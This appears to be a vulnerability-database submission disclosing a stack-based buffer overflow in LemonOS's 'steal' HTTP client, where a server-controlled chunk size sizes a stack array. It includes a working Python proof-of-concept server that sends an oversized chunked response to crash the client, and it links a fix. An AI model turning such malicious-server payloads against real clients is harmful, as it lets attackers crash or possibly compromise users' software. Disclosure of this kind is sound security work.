| Title | LemonOS Lemon OS nightly-2024-07-12 Buffer Overflow |
|---|
| Description | Description
This vulnerability was identified as a result of collaborative efforts between 0xHamy and 0xVpr, I identified the vulnerability and 0xVpr mitigated against it by providing a fix.
This report details a stack overflow vulnerability in the steal HTTP client (curl equivalent for LemonOS), identified during an analysis conducted on April 10, 2025. The vulnerability arises from the use of a variable-length array (VLA) in the HTTPGet function, specifically at line 361 of main.cpp, where char recieveBuffer[chunkSize]; is declared.
The chunkSize value is controlled by an external HTTP server response, allowing an attacker to trigger a crash or potentially escalate the impact with precise manipulation.
Reproduce
Download and put the following two files in the same directory:
https://github.com/LemonOSProject/LemonOS/blob/master/Applications/Steal/main.cpp
https://github.com/LemonOSProject/LemonOS/blob/master/LibLemon/include/Lemon/Core/URL.h
Compile the code:
g++ -g -o steal main.cpp -lssl -lcrypto
Create a python server that responds with a 10MB data size to any incoming requests:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 80))
s.listen(1)
print("Listening on 127.0.0.1:80")
conn, addr = s.accept()
conn.recv(1024)
response = b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
chunk_size = 10485760 # 10MB
payload = b"A" * chunk_size
response += f"{hex(chunk_size)[2:]}".encode() + b"\r\n"
response += payload + b"\r\n"
response += b"0\r\n\r\n"
conn.send(response)
conn.close()
s.close()
Ensure Python-3 is installed and then run this:
$ python3 server.py
Think of this as a normal server that makes a 10MB installer available to users when they request it.
Compile the steal binary:
g++ -g -o steal main.cpp -lssl -lcrypto
Run it by sending a request to the server with steal binary:
./steal "127.0.0.1"
This will trigger a segmentation fault and crashes the program.
For a more extensive & detailed proof of concept, see the issue I opened on Github:
https://github.com/LemonOSProject/LemonOS/issues/60
Mitigation
0xVpr has modified main.cpp and fixed the bug:
https://gist.github.com/0xHamy/f54f672ddf49e41e550350448e4c93a9
You can now run the same attack again and serve a chunk_size of 100MB or 10x the amount we used for our initial tests and you will notice that steal doesn't crash no more. |
|---|
| Source | ⚠️ https://hkohi.ca/vulnerability/16 |
|---|
| User | 0xHamy (UID 88518) |
|---|
| Submission | 07/29/2025 20:27 (9 months ago) |
|---|
| Moderation | 08/13/2025 20:54 (15 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 320030 [LemonOS up to nightly-2024-07-12 on LemonOS HTTP Client main.cpp HTTPGet chunkSize stack-based overflow] |
|---|
| Points | 20 |
|---|